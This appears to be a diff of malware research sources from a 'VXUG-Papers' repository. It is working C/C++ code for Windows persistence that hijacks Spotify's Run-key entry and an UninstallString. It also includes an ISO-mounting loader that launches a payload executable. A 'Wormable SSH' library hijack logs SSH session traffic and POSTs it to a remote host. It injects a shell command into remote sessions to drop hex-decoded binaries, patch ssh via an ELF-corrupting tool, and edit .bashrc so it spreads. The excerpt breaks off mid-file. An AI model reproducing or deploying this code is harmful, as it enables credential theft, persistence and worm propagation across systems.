if (RegOpenKeyEx(phkResult, lpName, 0, KEY_ALL_ACCESS, &hOpenKey) != ERROR_SUCCESS)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
Enum = 2048;
|
||||
|
||||
|
||||
if (RegGetValue(hOpenKey, NULL, L"UninstallString", RRF_RT_REG_SZ, NULL, pvData, &Enum) != ERROR_SUCCESS)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
if (GetModuleFileName(NULL, bValue, WCHAR_MAXPATH) == 0)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
lpUninstallString = (PWCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, WCHAR_MAXPATH);
|
||||
if (lpUninstallString == NULL)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
swprintf(lpUninstallString, L"powershell.exe start-process %ws -verb runas", bValue);
|
||||
|
||||
|
||||
if (wcscmp(lpUninstallString, pvData) == ERROR_SUCCESS)
|
||||
{
|
||||
if (phkResult)
|
||||
{
|
||||
RegCloseKey(phkResult);
|
||||
}
|
||||
|
||||
if (hOpenKey)
|
||||
{
|
||||
RegCloseKey(hOpenKey);
|
||||
}
|
||||
|
||||
if (lpUninstallString)
|
||||
{
|
||||
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, lpUninstallString);
|
||||
}
|
||||
|
||||
return ERROR_FILE_EXISTS;
|
||||
}
|
||||
|
||||
if (RegSetValueEx(hOpenKey, L"UninstallString", 0, REG_SZ, (PBYTE)lpUninstallString, (wcslen(lpUninstallString) * sizeof(WCHAR))) != ERROR_SUCCESS)
|
||||
{
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
if (hOpenKey)
|
||||
{
|
||||
RegCloseKey(hOpenKey);
|
||||
}
|
||||
|
||||
break;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
if (lpUninstallString)
|
||||
{
|
||||
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, lpUninstallString);
|
||||
}
|
||||
|
||||
if (phkResult)
|
||||
{
|
||||
RegCloseKey(phkResult);
|
||||
}
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
dwReservedError = GetLastError();
|
||||
|
||||
if (phkResult)
|
||||
{
|
||||
RegCloseKey(phkResult);
|
||||
}
|
||||
|
||||
if (hOpenKey)
|
||||
{
|
||||
RegCloseKey(hOpenKey);
|
||||
}
|
||||
|
||||
if (lpUninstallString)
|
||||
{
|
||||
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, lpUninstallString);
|
||||
}
|
||||
|
||||
return dwReservedError;
|
||||
}
|
Binary file not shown.
|
@ -0,0 +1,115 @@
|
|||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR))
|
||||
|
||||
|
||||
DWORD MasqueradeSpotifyKey(VOID);
|
||||
|
||||
|
||||
int main(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
WCHAR wModulePath[WCHAR_MAXPATH] = { 0 };
|
||||
|
||||
if (GetModuleFileNameW(NULL, wModulePath, WCHAR_MAXPATH) == 0)
|
||||
goto FAILURE;
|
||||
|
||||
if (wcsstr(wModulePath, L"Spotify") == NULL)
|
||||
{
|
||||
if (MasqueradeSpotifyKey() != ERROR_SUCCESS)
|
||||
goto FAILURE;
|
||||
}
|
||||
else
|
||||
MessageBoxA(NULL, "", "", MB_OK);
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
|
||||
FAILURE:
|
||||
|
||||
dwError = GetLastError();
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
||||
DWORD MasqueradeSpotifyKey(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
WCHAR wModulePath[WCHAR_MAXPATH] = { 0 }, wNewPath[WCHAR_MAXPATH] = { 0 };
|
||||
WCHAR wRegistryPath[WCHAR_MAXPATH] = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
|
||||
HKEY hKey = NULL, hHive = HKEY_CURRENT_USER;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
dwError = (LRESULT)RegOpenKeyExW(hHive, wRegistryPath, 0, KEY_ALL_ACCESS, &hKey);
|
||||
if (dwError != ERROR_SUCCESS)
|
||||
goto FAILURE;
|
||||
|
||||
for (; dwError < 256; dwError++)
|
||||
{
|
||||
DWORD dwReturn = 0, lpType = 0, dwValueSize = WCHAR_MAXPATH, dwDataSize = WCHAR_MAXPATH;
|
||||
BYTE lpData[WCHAR_MAXPATH] = { 0 };
|
||||
WCHAR wString[WCHAR_MAXPATH] = { 0 };
|
||||
WCHAR lpValue[WCHAR_MAXPATH] = { 0 };
|
||||
|
||||
dwReturn = (LSTATUS)RegEnumValueW(hKey, dwError, lpValue, &dwValueSize, NULL, &lpType, lpData, &dwDataSize);
|
||||
if (dwReturn != ERROR_SUCCESS && dwError != ERROR_NO_MORE_ITEMS)
|
||||
goto FAILURE;
|
||||
|
||||
if (lpType != REG_SZ)
|
||||
continue;
|
||||
|
||||
swprintf(wString, L"%ws", lpData);
|
||||
|
||||
if (wcsstr(wString, L"Spotify") != NULL)
|
||||
{
|
||||
bFlag = TRUE;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (!bFlag)
|
||||
{
|
||||
SetLastError(ERROR_FILE_NOT_FOUND);
|
||||
goto FAILURE;
|
||||
}
|
||||
|
||||
if (GetEnvironmentVariableW(L"APPDATA", wModulePath, WCHAR_MAXPATH) == 0)
|
||||
goto FAILURE;
|
||||
|
||||
wcscat(wModulePath, L"\\Spotify\\Spotify.exe");
|
||||
|
||||
if (GetEnvironmentVariableW(L"APPDATA", wNewPath, WCHAR_MAXPATH) == 0)
|
||||
goto FAILURE;
|
||||
|
||||
wcscat(wNewPath, L"\\Spotify\\RealSpotify.exe");
|
||||
|
||||
if (!MoveFile(wModulePath, wNewPath))
|
||||
goto FAILURE;
|
||||
|
||||
ZeroMemory(wModulePath, WCHAR_MAXPATH); ZeroMemory(wNewPath, WCHAR_MAXPATH);
|
||||
|
||||
if (GetModuleFileNameW(NULL, wModulePath, WCHAR_MAXPATH) == 0)
|
||||
goto FAILURE;
|
||||
|
||||
if (GetEnvironmentVariableW(L"APPDATA", wNewPath, WCHAR_MAXPATH) == 0)
|
||||
goto FAILURE;
|
||||
|
||||
wcscat(wNewPath, L"\\Spotify\\Spotify.exe");
|
||||
|
||||
if (!CopyFile(wModulePath, wNewPath, TRUE))
|
||||
goto FAILURE;
|
||||
|
||||
if (hKey)
|
||||
RegCloseKey(hKey);
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
|
||||
FAILURE:
|
||||
|
||||
dwError = GetLastError();
|
||||
|
||||
if (hKey)
|
||||
RegCloseKey(hKey);
|
||||
|
||||
return dwError;
|
||||
}
|
Binary file not shown.
Binary file not shown.
211
VXUG-Papers/Weaponizing Windows Virtualization/src.cpp
Normal file
211
VXUG-Papers/Weaponizing Windows Virtualization/src.cpp
Normal file
|
@ -0,0 +1,211 @@
|
|||
#include <Windows.h>
|
||||
#include <virtdisk.h>
|
||||
#include <stdio.h>
|
||||
#include <initguid.h>
|
||||
#include <sddl.h>
|
||||
|
||||
//necessary includes + PEB definition
|
||||
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
PWSTR Buffer;
|
||||
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
|
||||
|
||||
typedef struct _LDR_MODULE {
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
PVOID BaseAddress;
|
||||
PVOID EntryPoint;
|
||||
ULONG SizeOfImage;
|
||||
UNICODE_STRING FullDllName;
|
||||
UNICODE_STRING BaseDllName;
|
||||
ULONG Flags;
|
||||
SHORT LoadCount;
|
||||
SHORT TlsIndex;
|
||||
LIST_ENTRY HashTableEntry;
|
||||
ULONG TimeDateStamp;
|
||||
} LDR_MODULE, * PLDR_MODULE;
|
||||
|
||||
typedef struct _PEB_LDR_DATA {
|
||||
ULONG Length;
|
||||
ULONG Initialized;
|
||||
PVOID SsHandle;
|
||||
LIST_ENTRY InLoadOrderModuleList;
|
||||
LIST_ENTRY InMemoryOrderModuleList;
|
||||
LIST_ENTRY InInitializationOrderModuleList;
|
||||
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
||||
|
||||
typedef struct _PEB {
|
||||
BOOLEAN InheritedAddressSpace;
|
||||
BOOLEAN ReadImageFileExecOptions;
|
||||
BOOLEAN BeingDebugged;
|
||||
BOOLEAN Spare;
|
||||
HANDLE Mutant;
|
||||
PVOID ImageBase;
|
||||
PPEB_LDR_DATA LoaderData;
|
||||
PVOID ProcessParameters;
|
||||
PVOID SubSystemData;
|
||||
PVOID ProcessHeap;
|
||||
PVOID FastPebLock;
|
||||
PVOID FastPebLockRoutine;
|
||||
PVOID FastPebUnlockRoutine;
|
||||
ULONG EnvironmentUpdateCount;
|
||||
PVOID* KernelCallbackTable;
|
||||
PVOID EventLogSection;
|
||||
PVOID EventLog;
|
||||
PVOID FreeList;
|
||||
ULONG TlsExpansionCounter;
|
||||
PVOID TlsBitmap;
|
||||
ULONG TlsBitmapBits[0x2];
|
||||
PVOID ReadOnlySharedMemoryBase;
|
||||
PVOID ReadOnlySharedMemoryHeap;
|
||||
PVOID* ReadOnlyStaticServerData;
|
||||
PVOID AnsiCodePageData;
|
||||
PVOID OemCodePageData;
|
||||
PVOID UnicodeCaseTableData;
|
||||
ULONG NumberOfProcessors;
|
||||
ULONG NtGlobalFlag;
|
||||
BYTE Spare2[0x4];
|
||||
LARGE_INTEGER CriticalSectionTimeout;
|
||||
ULONG HeapSegmentReserve;
|
||||
ULONG HeapSegmentCommit;
|
||||
ULONG HeapDeCommitTotalFreeThreshold;
|
||||
ULONG HeapDeCommitFreeBlockThreshold;
|
||||
ULONG NumberOfHeaps;
|
||||
ULONG MaximumNumberOfHeaps;
|
||||
PVOID** ProcessHeaps;
|
||||
PVOID GdiSharedHandleTable;
|
||||
PVOID ProcessStarterHelper;
|
||||
PVOID GdiDCAttributeList;
|
||||
PVOID LoaderLock;
|
||||
ULONG OSMajorVersion;
|
||||
ULONG OSMinorVersion;
|
||||
ULONG OSBuildNumber;
|
||||
ULONG OSPlatformId;
|
||||
ULONG ImageSubSystem;
|
||||
ULONG ImageSubSystemMajorVersion;
|
||||
ULONG ImageSubSystemMinorVersion;
|
||||
ULONG GdiHandleBuffer[0x22];
|
||||
ULONG PostProcessInitRoutine;
|
||||
ULONG TlsExpansionBitmap;
|
||||
BYTE TlsExpansionBitmapBits[0x80];
|
||||
ULONG SessionId;
|
||||
} PEB, * PPEB;
|
||||
|
||||
PPEB RtlGetPeb(VOID);
|
||||
|
||||
#define DEFAULT_DATA_ALLOCATION_SIZE (MAX_PATH * sizeof(WCHAR))
|
||||
|
||||
int wmain(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
VIRTUAL_STORAGE_TYPE VirtualStorageType = { 0 };
|
||||
OPEN_VIRTUAL_DISK_PARAMETERS Parameters;
|
||||
ATTACH_VIRTUAL_DISK_PARAMETERS AttachParameters;
|
||||
HANDLE VirtualObject = NULL, hToken = NULL;
|
||||
WCHAR lpIsoPath[DEFAULT_DATA_ALLOCATION_SIZE] = { 0 };
|
||||
WCHAR lpIsoAbstractedPath[DEFAULT_DATA_ALLOCATION_SIZE] = { 0 };
|
||||
PPEB Peb = (PPEB)RtlGetPeb();
|
||||
static GUID VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT_EX = { 0xEC984AEC ,0xA0F9, 0x47e9, 0x901F, 0x71415A66345B };
|
||||
LUID Luid = { 0 };
|
||||
TOKEN_PRIVILEGES Tp = { 0 };
|
||||
PSECURITY_DESCRIPTOR Sd;
|
||||
DWORD dwData = DEFAULT_DATA_ALLOCATION_SIZE;
|
||||
STARTUPINFOW Info = { 0 };
|
||||
PROCESS_INFORMATION ProcessInformation = { 0 };
|
||||
|
||||
//make sure we're on Windows 10
|
||||
if (Peb->OSMajorVersion != 0x0a)
|
||||
goto FAILURE;
|
||||
|
||||
//get userprofile e.g. %SystemDrive%\Users\{username}
|
||||
if (GetEnvironmentVariableW(L"USERPROFILE", lpIsoPath, DEFAULT_DATA_ALLOCATION_SIZE) == 0)
|
||||
goto FAILURE;
|
||||
else //append \\desktop\\demo.iso if successful
|
||||
wcscat(lpIsoPath, L"\\Desktop\\Demo.iso");
|
||||
|
||||
//get thread tokens
|
||||
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken))
|
||||
{
|
||||
if (!ImpersonateSelf(SecurityImpersonation))
|
||||
goto FAILURE;
|
||||
|
||||
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken))
|
||||
goto FAILURE;
|
||||
}
|
||||
|
||||
//see if we have the privilege to manage volumes
|
||||
if (!LookupPrivilegeValueW(NULL, L"SeManageVolumePrivilege", &Luid))
|
||||
goto FAILURE;
|
||||
|
||||
Tp.PrivilegeCount = 1;
|
||||
Tp.Privileges[0].Luid = Luid;
|
||||
Tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
|
||||
//get SeManageVolumePrivilege
|
||||
if (!AdjustTokenPrivileges(hToken, FALSE, &Tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL))
|
||||
goto FAILURE;
|
||||
|
||||
VirtualStorageType.DeviceId = VIRTUAL_STORAGE_TYPE_DEVICE_ISO;
|
||||
VirtualStorageType.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT_EX;
|
||||
|
||||
Parameters.Version = OPEN_VIRTUAL_DISK_VERSION_1;
|
||||
Parameters.Version1.RWDepth = OPEN_VIRTUAL_DISK_RW_DEPTH_DEFAULT;
|
||||
|
||||
//open iso file
|
||||
if(OpenVirtualDisk(&VirtualStorageType, lpIsoPath,
|
||||
VIRTUAL_DISK_ACCESS_ATTACH_RO | VIRTUAL_DISK_ACCESS_GET_INFO,
|
||||
OPEN_VIRTUAL_DISK_FLAG_NONE, &Parameters,
|
||||
&VirtualObject) != ERROR_SUCCESS)
|
||||
{
|
||||
goto FAILURE;
|
||||
}
|
||||
|
||||
//attach to harddisk with no drive letter/path
|
||||
AttachParameters.Version = ATTACH_VIRTUAL_DISK_VERSION_1;
|
||||
if (AttachVirtualDisk(VirtualObject, 0,
|
||||
ATTACH_VIRTUAL_DISK_FLAG_READ_ONLY | ATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER,
|
||||
0, &AttachParameters, 0) != ERROR_SUCCESS)
|
||||
{
|
||||
goto FAILURE;
|
||||
}
|
||||
|
||||
|
||||
//get physical path
|
||||
if (GetVirtualDiskPhysicalPath(VirtualObject, &dwData, lpIsoAbstractedPath) != ERROR_SUCCESS)
|
||||
goto FAILURE;
|
||||
else //if we are able to get physical path, append payload exe that we know is inside of iso file
|
||||
wcscat(lpIsoAbstractedPath, L"\\Demo.exe");
|
||||
|
||||
//run malicious executable
|
||||
if (!CreateProcess(lpIsoAbstractedPath, NULL, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, NULL, &Info, &ProcessInformation))
|
||||
goto FAILURE;
|
||||
|
||||
//close everything
|
||||
if (VirtualObject)
|
||||
CloseHandle(VirtualObject);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
|
||||
FAILURE: //generic error handling routine, get last error and close any handles that may be open
|
||||
|
||||
dwError = GetLastError();
|
||||
|
||||
if (VirtualObject)
|
||||
CloseHandle(VirtualObject);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
||||
PPEB RtlGetPeb(VOID)
|
||||
{
|
||||
return (PPEB)__readgsqword(0x60);
|
||||
}
|
255
VXUG-Papers/Wormable SSH/Source/c.so.6.c
Normal file
255
VXUG-Papers/Wormable SSH/Source/c.so.6.c
Normal file
|
@ -0,0 +1,255 @@
|
|||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
#include <fcntl.h>
|
||||
#include <dirent.h>
|
||||
#include <dlfcn.h>
|
||||
#include <string.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/stat.h>
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <ctype.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/types.h>
|
||||
#include <netinet/in.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <sys/sendfile.h>
|
||||
#include <signal.h>
|
||||
|
||||
#ifndef LIBC_PATH
|
||||
#define LIBC_PATH "/usr/lib/x86_64-linux-gnu/libc.so.6"
|
||||
#endif
|
||||
|
||||
void *handle;
|
||||
int (*real_getopt)(int argc, char *const argv[],
|
||||
const char *optstring);
|
||||
/*
|
||||
typedef void (*sighandler_t)(int);
|
||||
sighandler_t (*real_signal)(int signum, sighandler_t handler);
|
||||
int (*real_sigaction)(int signum, const struct sigaction *act,
|
||||
struct sigaction *oldact);
|
||||
*/
|
||||
int (*real_close)(int fd);
|
||||
size_t (*real_write)(int fd, const void *buf, size_t count) = NULL;
|
||||
size_t (*real_read)(int fd, void *buf, size_t count) = NULL;
|
||||
struct stat log_statbuf;
|
||||
|
||||
int log_fd = -1;
|
||||
char capsule[512] = {0};
|
||||
//int inject = 0;
|
||||
|
||||
char *host = "127.0.0.1";
|
||||
char *port = "9999";
|
||||
char *resource = "upload.php";
|
||||
int size = 201;
|
||||
|
||||
int sock_fd;
|
||||
struct sockaddr_in addr;
|
||||
|
||||
void do_post(void)
|
||||
{
|
||||
host = "10.0.2.2";
|
||||
sock_fd = socket(AF_INET, SOCK_STREAM, 0);
|
||||
addr.sin_family = AF_INET;
|
||||
addr.sin_port = htons(atoi(port));
|
||||
addr.sin_addr.s_addr = inet_addr(host);
|
||||
|
||||
connect(sock_fd, (struct sockaddr *)&addr, sizeof(struct sockaddr));
|
||||
|
||||
size += log_statbuf.st_size;
|
||||
|
||||
sprintf(capsule,
|
||||
"POST http://%s:%s/%s HTTP/1.1\r\n"
|
||||
"Host: %s:%s\r\n"
|
||||
"Accept: */*\r\n"
|
||||
"Content-Type: multipart/form-data; boundary=------------------------4ae6d1de929f9e46\r\n"
|
||||
"Content-Length: %d\r\n"
|
||||
"\r\n"
|
||||
"--------------------------4ae6d1de929f9e46\r\n"
|
||||
"Content-Disposition: form-data; name=\"vxlog\"; filename=\"vxlog.txt\"\r\n"
|
||||
"Content-Type: application/octet-stream\r\n"
|
||||
"\n",
|
||||
host, port, resource, host, port, size);
|
||||
|
||||
real_write(sock_fd, capsule, strlen(capsule));
|
||||
sendfile(sock_fd, log_fd, 0, log_statbuf.st_size);
|
||||
real_write(sock_fd, "\n\n--------------------------4ae6d1de929f9e46--\r\n", 48);
|
||||
close(sock_fd);
|
||||
}
|
||||
|
||||
char *lcso_envar(void)
|
||||
{
|
||||
char *env_lcso = NULL;
|
||||
struct stat stat_dynamicorrupt;
|
||||
int envsz = 0;
|
||||
char path[128];
|
||||
sprintf(path, "%s/.bin/c.so.6.hex", getenv("HOME"));
|
||||
int fd = open(path, O_RDONLY);
|
||||
fstat(fd, &stat_dynamicorrupt);
|
||||
env_lcso = malloc(stat_dynamicorrupt.st_size + strlen("LC_BIN2="));
|
||||
strcpy(env_lcso, "LC_BIN2=");
|
||||
syscall(__NR_read, fd, env_lcso + strlen("LC_BIN2="), stat_dynamicorrupt.st_size);
|
||||
syscall(__NR_close, fd);
|
||||
return env_lcso;
|
||||
}
|
||||
|
||||
char *dynamicorrupt_envar(void)
|
||||
{
|
||||
char *env_dynamicorrupt = NULL;
|
||||
struct stat stat_dynamicorrupt;
|
||||
int envsz = 0;
|
||||
char path[128];
|
||||
sprintf(path, "%s/.bin/dynamicorrupt.hex", getenv("HOME"));
|
||||
int fd = open(path, O_RDONLY);
|
||||
fstat(fd, &stat_dynamicorrupt);
|
||||
env_dynamicorrupt = malloc(stat_dynamicorrupt.st_size + strlen("LC_BIN1="));
|
||||
strcpy(env_dynamicorrupt, "LC_BIN1=");
|
||||
syscall(__NR_read, fd, env_dynamicorrupt + strlen("LC_BIN1="), stat_dynamicorrupt.st_size);
|
||||
syscall(__NR_close, fd);
|
||||
return env_dynamicorrupt;
|
||||
}
|
||||
|
||||
__attribute__((constructor)) int change_args(int argc, char **argv, char **envp)
|
||||
{
|
||||
int env_size = 0;
|
||||
|
||||
if (getenv("VXCOOL") == NULL)
|
||||
{
|
||||
char **envar = envp;
|
||||
while (*envar++ != NULL)
|
||||
env_size++;
|
||||
|
||||
char **new_envp = malloc(sizeof(char *) * env_size + 3);
|
||||
for (int i = 0; i < env_size; i++)
|
||||
new_envp[i] = strdup(envp[i]);
|
||||
|
||||
new_envp[env_size] = "VXCOOL=true";
|
||||
new_envp[env_size + 1] = dynamicorrupt_envar();
|
||||
new_envp[env_size + 2] = lcso_envar();
|
||||
new_envp[env_size + 3] = NULL;
|
||||
|
||||
char **new_argv = malloc(sizeof(char *) * (argc + 4));
|
||||
for (int i = 0; i < argc; i++)
|
||||
new_argv[i] = strdup(argv[i]);
|
||||
|
||||
new_argv[argc] = "-t";
|
||||
new_argv[argc + 1] = "-SendEnv";
|
||||
new_argv[argc + 2] =
|
||||
"rm -rf $HOME/.bin;"
|
||||
"mkdir $HOME/.bin/;"
|
||||
"cp $(which ssh) $HOME/.bin/;"
|
||||
"printenv LC_BIN1 > $HOME/.bin/dynamicorrupt.hex;"
|
||||
"cat $HOME/.bin/dynamicorrupt.hex | xxd -plain -revert > $HOME/.bin/dynamicorrupt;"
|
||||
"chmod +x $HOME/.bin/dynamicorrupt;"
|
||||
"$HOME/.bin/dynamicorrupt $HOME/.bin/ssh;"
|
||||
|
||||
"printenv LC_BIN2 > $HOME/.bin/c.so.6.hex;"
|
||||
"cat $HOME/.bin/c.so.6.hex | xxd -plain -revert > $HOME/.bin/c.so.6;"
|
||||
"chmod +x $HOME/.bin/c.so.6;"
|
||||
|
||||
"echo \"export PATH=$HOME/.bin:$PATH\" >> $HOME/.bashrc;"
|
||||
"echo \"export LD_LIBRARY_PATH=$HOME/.bin/\" >> $HOME/.bashrc;"
|
||||
|
||||
"export PATH=$HOME/.bin:$PATH;"
|
||||
"export LD_LIBRARY_PATH=$HOME/.bin/;"
|
||||
|
||||
"$SHELL -i;";
|
||||
new_argv[argc + 3] = NULL;
|
||||
execve("/proc/self/exe", new_argv, new_envp);
|
||||
}
|
||||
else
|
||||
unsetenv("VXCOOL");
|
||||
return 0;
|
||||
}
|
||||
|
||||
__attribute__((constructor)) void _initf(int ac, char **av)
|
||||
{
|
||||
for (int i = 0; i < ac; i++)
|
||||
{
|
||||
printf("av[%d] = %s\n", i, av[i]);
|
||||
}
|
||||
|
||||
//debug __asm__("int3\r\n");
|
||||
handle = dlopen(LIBC_PATH, RTLD_LAZY);
|
||||
//puts("hi");
|
||||
//real_sigaction = (void *)dlsym(handle, "sigaction");
|
||||
//real_signal = (void *)dlsym(handle, "signal");
|
||||
//real_getopt = (void *)dlsym(handle, "getopt");
|
||||
real_close = (void *)dlsym(handle, "close");
|
||||
real_write = (void *)dlsym(handle, "write");
|
||||
real_read = (void *)dlsym(handle, "read");
|
||||
log_fd = open("/tmp/.sshlog", O_APPEND | O_CREAT | O_RDWR, S_IRWXU);
|
||||
log_fd = dup2(log_fd, 42);
|
||||
}
|
||||
|
||||
__attribute__((destructor)) void _finif(void)
|
||||
{
|
||||
lseek(log_fd, 0, SEEK_SET);
|
||||
fstat(log_fd, &log_statbuf);
|
||||
do_post();
|
||||
syscall(__NR_close, log_fd);
|
||||
unlink("/tmp/.sshlog");
|
||||
}
|
||||
|
||||
int BSDgetopt(int argc, char *const argv[],
|
||||
const char *optstring)
|
||||
{
|
||||
printf("argc = %d\n", argc);
|
||||
for (int i = 0; i < argc; i++)
|
||||
printf("argv[%d] = %s\n", i, argv[i]);
|
||||
|
||||
return real_getopt(argc, argv, optstring);
|
||||
}
|
||||
|
||||
/*
|
||||
int sigaction(int signum, const struct sigaction *act,
|
||||
struct sigaction *oldact)
|
||||
{
|
||||
if (signum == SIGWINCH)
|
||||
inject = 1;
|
||||
return real_sigaction(signum, act, oldact);
|
||||
}
|
||||
|
||||
sighandler_t signal(int signum, sighandler_t handler)
|
||||
{
|
||||
if (signum == SIGWINCH)
|
||||
inject = 1;
|
||||
return real_signal(signum, handler);
|
||||
}
|
||||
*/
|
||||
|
||||
int close(int fd)
|
||||
{
|
||||
if (fd == log_fd)
|
||||
return 0;
|
||||
return real_close(fd);
|
||||
}
|
||||
|
||||
ssize_t write(int fd, const void *buf, size_t count)
|
||||
{
|
||||
int ret = (real_write(fd, buf, count));
|
||||
syscall(__NR_write, log_fd, "[write]:", 8);
|
||||
//if ((fd == 5 || fd == 6) && count > 1)
|
||||
// syscall(__NR_write, log_fd, buf, ret);
|
||||
for (int i = 0; i < ret; i++)
|
||||
if (isprint(((char *)buf)[i]) || ((char *)buf)[i] == '\n')
|
||||
syscall(__NR_write, log_fd, &((char *)buf)[i], 1);
|
||||
syscall(__NR_write, log_fd, "\n", 1);
|
||||
return ret;
|
||||
}
|
||||
|
||||
ssize_t read(int fd, void *buf, size_t count)
|
||||
{
|
||||
int ret = (real_read(fd, buf, count));
|
||||
syscall(__NR_write, log_fd, "[read]:", 7);
|
||||
//if (fd == 4)
|
||||
// syscall(__NR_write, log_fd, buf, ret);
|
||||
for (int i = 0; i < ret; i++)
|
||||
if (isprint(((char *)buf)[i]))
|
||||
syscall(__NR_write, log_fd, &((char *)buf)[i], 1);
|
||||
syscall(__NR_write, log_fd, "\n", 1);
|
||||
return ret;
|
||||
}
|
160
VXUG-Papers/Wormable SSH/Source/dynamicorrupt.c
Normal file
160
VXUG-Papers/Wormable SSH/Source/dynamicorrupt.c
Normal file
|
@ -0,0 +1,160 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <elf.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/stat.h>
|
||||
#include <fcntl.h>
|
||||
#include <string.h>
|
||||
|
||||
int dynamicorrupt(char *elf_buff, char *target_lib)
|
||||
{
|
||||
Elf64_Ehdr *ehdr = (Elf64_Ehdr *)elf_buff;
|
||||
Elf64_Shdr *shdr = (Elf64_Shdr *)&elf_buff[ehdr->e_shoff];
|
||||
char *string_table = &elf_buff[shdr[ehdr->e_shstrndx].sh_offset];
|
||||
Elf64_Phdr *phdr = (Elf64_Phdr *)&elf_buff[ehdr->e_phoff];
|
||||
Elf64_Dyn *dyn_base = NULL;
|
||||
char *dynstr_base = NULL;
|
||||
unsigned long seg_size = 0;
|
||||
unsigned long n_entries = 0;
|
||||
Elf64_Xword new_d_val = 0;
|
||||
int dt_needed_index = -1;
|
||||
int dt_debug_index = -1;
|
||||
|
||||
for (int i = 0; i < ehdr->e_phnum; i++)
|
||||
{
|
||||
if (phdr[i].p_type == PT_DYNAMIC)
|
||||
{
|
||||
dyn_base = (Elf64_Dyn *)&elf_buff[phdr[i].p_offset];
|
||||
seg_size = phdr[i].p_filesz;
|
||||
n_entries = phdr[i].p_filesz / sizeof(Elf64_Dyn);
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (dyn_base == NULL)
|
||||
{
|
||||
puts("PT_DYNAMIC header not found!");
|
||||
return 1;
|
||||
}
|
||||
|
||||
for (int i = 0; i < ehdr->e_shnum; i++)
|
||||
{
|
||||
if (!strcmp(&string_table[shdr[i].sh_name], ".dynstr"))
|
||||
{
|
||||
dynstr_base = (char *)&elf_buff[shdr[i].sh_offset];
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (dynstr_base == NULL)
|
||||
{
|
||||
puts(".dynstr section not found!");
|
||||
return 2;
|
||||
}
|
||||
|
||||
for (int i = 0; i < n_entries; i++)
|
||||
{
|
||||
if (dyn_base[i].d_tag == DT_NEEDED &&
|
||||
!strcmp(&dynstr_base[dyn_base[i].d_un.d_val], target_lib))
|
||||
dt_needed_index = i;
|
||||
|
||||
if (dyn_base[i].d_tag == DT_DEBUG)
|
||||
dt_debug_index = i;
|
||||
}
|
||||
|
||||
if (dt_needed_index == -1)
|
||||
return 3;
|
||||
if (dt_debug_index == -1)
|
||||
return 4;
|
||||
|
||||
dyn_base[dt_debug_index].d_tag = DT_NEEDED;
|
||||
|
||||
if (dt_debug_index > dt_needed_index) {
|
||||
dyn_base[dt_debug_index].d_un.d_val = dyn_base[dt_needed_index].d_un.d_val;
|
||||
dyn_base[dt_needed_index].d_un.d_val = dyn_base[dt_debug_index].d_un.d_val+3;
|
||||
} else
|
||||
dyn_base[dt_debug_index].d_un.d_val = dyn_base[dt_needed_index].d_un.d_val+3;
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
char *input_path;
|
||||
char *output_path;
|
||||
char *target_lib = "libc.so.6";
|
||||
|
||||
switch (argc)
|
||||
{
|
||||
case 4:
|
||||
input_path = argv[1];
|
||||
